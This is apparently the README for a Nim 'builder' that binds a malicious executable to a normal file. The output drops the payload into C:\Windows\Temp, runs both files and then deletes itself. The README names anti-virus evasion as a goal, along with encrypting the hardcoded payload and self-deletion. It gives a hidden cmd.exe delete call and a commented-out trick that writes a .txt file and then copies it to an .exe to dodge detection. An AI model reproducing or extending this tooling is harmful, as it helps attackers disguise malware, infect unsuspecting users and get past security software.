A Builder for Binding Evil File and Normal File with auto release
written by Nim(Just a routh tool of learning Nim)
you should install the mingw , ex in Mac:
brew install mingw
It will release your malicious files to C:\Windows\Temp, and then self-delete and run normal files and malicious files
- Reduce the risk of being detected by anti-virus
- “hardcode” the file into code with encrypt
- self delete
1. There are still many imperfections in the code, which need to be modified when used:
Change the name of the output executable program, of course, you need to change the name of the automatic deletion:
ShellExecute(0, "open", "cmd.exe", "/c del *CustomFileName*", NULL, SW_HIDE)
Of course you can also leave out this parameters,
I am a lazy guy... sorry my bad :)
2. In lines 116-117, the code I have commented, you can enable it and modify the corresponding name, which may be useful for evasion anti-virus
#copyFile("C:\\Windows\\Temp\\calc.txt", "C:\\Windows\\Temp\\calc.exe")
Release a txt file first, then copy to PE